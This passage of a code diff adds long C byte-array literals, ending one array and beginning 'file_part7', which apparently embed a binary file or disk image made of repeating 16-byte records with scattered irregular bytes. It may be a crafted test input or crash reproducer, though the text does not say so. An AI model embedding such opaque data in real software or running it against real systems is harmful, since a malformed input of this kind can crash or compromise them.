+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x2a\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\xd7\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x1f\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x12\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x1b"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+;
+char file_part7[]=
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x4e\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x82\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\xef\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x14\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
